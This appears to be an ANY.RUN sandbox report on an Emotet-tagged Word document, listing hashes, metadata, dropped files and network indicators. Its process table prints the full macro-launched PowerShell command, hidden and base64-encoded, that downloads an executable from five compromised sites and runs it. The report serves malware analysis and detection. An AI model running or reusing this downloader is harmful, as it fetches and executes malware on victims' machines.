analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

C841E447FF1D4722442DC3422515956CF4DF48DB.doc

Full analysis: https://app.any.run/tasks/8035ecae-fc59-4b62-ac8e-080270adc7db
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: May 20, 2019, 10:51:00
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
emotet-doc
emotet
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: deliverables fault-tolerant eco-centric, Subject: Bedfordshire, Author: Jaycee Nader, Comments: strategize initiative, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Mon May 20 07:20:00 2019, Last Saved Time/Date: Mon May 20 07:20:00 2019, Number of Pages: 1, Number of Words: 11, Number of Characters: 63, Security: 0
MD5:

D8DF955AA95DE9AE7A110E4F2002C877

SHA1:

C841E447FF1D4722442DC3422515956CF4DF48DB

SHA256:

E352A2D273403FE35B6C1B9331DBFB1DC21C52856F1E928D33647430F0696212

SSDEEP:

3072:d77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qGaXX5ujgXtNM+eQQ:d77HUUUUUUUUUUUUUUUUUUUT52VJaXXs

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Executed via WMI

      • powershell.exe (PID: 2632)
    • PowerShell script executed

      • powershell.exe (PID: 2632)
    • Creates files in the user directory

      • powershell.exe (PID: 2632)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2924)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2924)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
Title: deliverables fault-tolerant eco-centric
Subject: Bedfordshire
Author: Jaycee Nader
Keywords: -
Comments: strategize initiative
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2019:05:20 06:20:00
ModifyDate: 2019:05:20 06:20:00
Pages: 1
Words: 11
Characters: 63
Security: None
CodePage: Windows Latin 1 (Western European)
Company: Hegmann - Hoppe
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 73
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
Manager: Ruecker
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
2
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2924"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\C841E447FF1D4722442DC3422515956CF4DF48DB.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2632powershell -ExecutionPolicy bypass -WindowStyle Hidden -noprofile -e JABSAF8ANwA4ADMAMgAwAD0AJwBJADgAMwA0ADQAMAAnADsAJABHADIAMQAyAF8AMQAzADgAIAA9ACAAJwA4ADgAMQAnADsAJABDADAAMAA3ADMANgA0AD0AJwB1ADQAXwA4ADQAOQBfACcAOwAkAEUANwAyAF8ANAA0ADUAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEcAMgAxADIAXwAxADMAOAArACcALgBlAHgAZQAnADsAJABZAF8AXwA5ADYANQAzADgAPQAnAHAAOAAzADIANwA5ADgANAAnADsAJABLADEAOAAyADgANgA9ACYAKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjAHQAJwApACAAbgBlAFQALgBgAHcAZQBCAGMAbABgAEkAYABlAE4AVAA7ACQAQQA3AF8AMgAyAF8AMQAyAD0AJwBoAHQAdABwADoALwAvAHQAZQBuAGEAbgB0AHMAYwByAGUAZQBuAGkAbgBnAGEAcwBpAGEALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAHoAcABqAGQAdgB5ADEANwAvAEAAaAB0AHQAcAA6AC8ALwBiAHkAcwB0AGUAawBzAHQAaQBsAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwB6AG0ANgA0ADgAMQAvAEAAaAB0AHQAcAA6AC8ALwBlAHIAaQBjAC0AbQBhAG4AZABhAGwAYQAuAGMAbwBtAC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAGYAagA2ADgANwAyADQAOAAxADIALwBAAGgAdAB0AHAAOgAvAC8AYQB2AGkAdAByAG8AbgBzAC4AYwBvAG0ALwB1AG0AYQAtAHMAaQB0AGUALwBpAHMAaQAyAC8AQABoAHQAdABwADoALwAvAGQAZQB2AGUAbABvAHAAaQBuAGcALgBzAG8AdQBsAGIAcgBpAGcAaAB0AHMALgBjAG8AbQAvAHcAcAAvAHMANAA0ADUALwAnAC4AUwBQAEwASQBUACgAJwBAACcAKQA7ACQAawAyADQAOAA3AF8AOAAzAD0AJwBYADUANgAyADUANgA2ACcAOwBmAG8AcgBlAGEAYwBoACgAJABmADEANABfADAAMQBfADQAIABpAG4AIAAkAEEANwBfADIAMgBfADEAMgApAHsAdAByAHkAewAkAEsAMQA4ADIAOAA2AC4ARABvAFcAbgBMAE8AYQBEAGYASQBMAEUAKAAkAGYAMQA0AF8AMAAxAF8ANAAsACAAJABFADcAMgBfADQANAA1ACkAOwAkAFUANQA3ADUANQA5ADAAPQAnAFcAXwA4ADUANAAyACcAOwBJAGYAIAAoACgAJgAoACcARwBlACcAKwAnAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQARQA3ADIAXwA0ADQANQApAC4ATABlAG4AZwBUAEgAIAAtAGcAZQAgADMAOQA3ADMAMQApACAAewAuACgAJwBJACcAKwAnAG4AdgBvAGsAZQAtACcAKwAnAEkAdABlAG0AJwApACAAJABFADcAMgBfADQANAA1ADsAJABPADMANgA5AF8AMwA4AD0AJwBKADEAOAAxADMANQAxACcAOwBiAHIAZQBhAGsAOwAkAEYAOABfADAAOQA0AD0AJwBaADgAMQAyADUAMwAxAF8AJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAcgA3ADUANQA5ADAAPQAnAGYANQA1ADgAMwA1ADIAOQAnAA==C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 343
Read events
880
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
7

Dropped files

PID
Process
Filename
Type
2924WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRE945.tmp.cvr
MD5:
SHA256:
2632powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\HQLS66SC5KB5QPWVW8JN.temp
MD5:
SHA256:
2924WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$41E447FF1D4722442DC3422515956CF4DF48DB.docpgc
MD5:B6F758205550A21CCCF95C83E04A6CD8
SHA256:D919CB56FEB9BBA822854D8944DD7B9F4F9203838D664BEEDE81371FD62F3918
2924WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:ACC006751B6D676B942922C9582338C2
SHA256:F2F6BE5D3903AE8CD5E0C65168C9B872D806D1CBA4F6F32E05CD75E5529E4ACA
2924WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1CA772F.wmfwmf
MD5:8A3EF78415626AEE783F04D162F9F7C4
SHA256:CB6FB8741DD493785F15BE325F357C867C21B4E661184238F3C32252163BF192
2924WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D323B9.wmfwmf
MD5:EBD9FB6170E49CA276FF43075F626FDC
SHA256:148361DFA53200F93BFD162C56E4E37A7079FD6C5CE540F55026E866A2939C0F
2924WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A5C1BC98.wmfwmf
MD5:A1759BDA71C3FE0B899A08B657C2643E
SHA256:13AD1498E24AE8D7E6FCE1B4FA1DD9855E865891B48CD56775EC3F351565A6C1
2924WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:816BEA007272E3D591722A84B2EBD2E8
SHA256:0BD48B965DD591F21A77D8C83E4C24FE5627C543192A698F7B1E1842A0EEDB5A
2924WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F6058666.wmfwmf
MD5:BE821216F0F5D750EEDC2DD731AB8104
SHA256:4F42EDBCAF8BC035D903D35AE0B34A5BC4D6D23B8595B29C8AE5281E25117AB1
2632powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF14f2ab.TMPbinary
MD5:5F9A7BF5388376D94C2EDCA422810BEC
SHA256:8B2183F4F2F735C231B1F81D46CB86CB1FB51168824DE82F3A9EA79C12CAF82C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2632
powershell.exe
GET
404
108.179.217.238:80
http://avitrons.com/uma-site/isi2/
US
xml
345 b
unknown
2632
powershell.exe
GET
404
78.24.184.133:80
http://developing.soulbrights.com/wp/s445/
HU
xml
345 b
suspicious
2632
powershell.exe
GET
404
195.154.162.233:80
http://bystekstil.com/wp-admin/zm6481/
FR
xml
345 b
suspicious
2632
powershell.exe
GET
404
91.216.107.155:80
http://eric-mandala.com/wp-content/fj68724812/
FR
xml
345 b
malicious
2632
powershell.exe
GET
404
202.71.110.22:80
http://tenantscreeningasia.com/wp-admin/zpjdvy17/
MY
xml
345 b
suspicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2632
powershell.exe
202.71.110.22:80
tenantscreeningasia.com
TM-VADS DC Hosting
MY
suspicious
2632
powershell.exe
108.179.217.238:80
avitrons.com
CyrusOne LLC
US
unknown
2632
powershell.exe
195.154.162.233:80
bystekstil.com
Online S.a.s.
FR
suspicious
2632
powershell.exe
91.216.107.155:80
eric-mandala.com
ADISTA SAS
FR
malicious
2632
powershell.exe
78.24.184.133:80
developing.soulbrights.com
ATW Internet Kft.
HU
suspicious

DNS requests

Domain
IP
Reputation
tenantscreeningasia.com
  • 202.71.110.22
suspicious
bystekstil.com
  • 195.154.162.233
suspicious
eric-mandala.com
  • 91.216.107.155
malicious
avitrons.com
  • 108.179.217.238
unknown
developing.soulbrights.com
  • 78.24.184.133
unknown

Threats

No threats detected
No debug info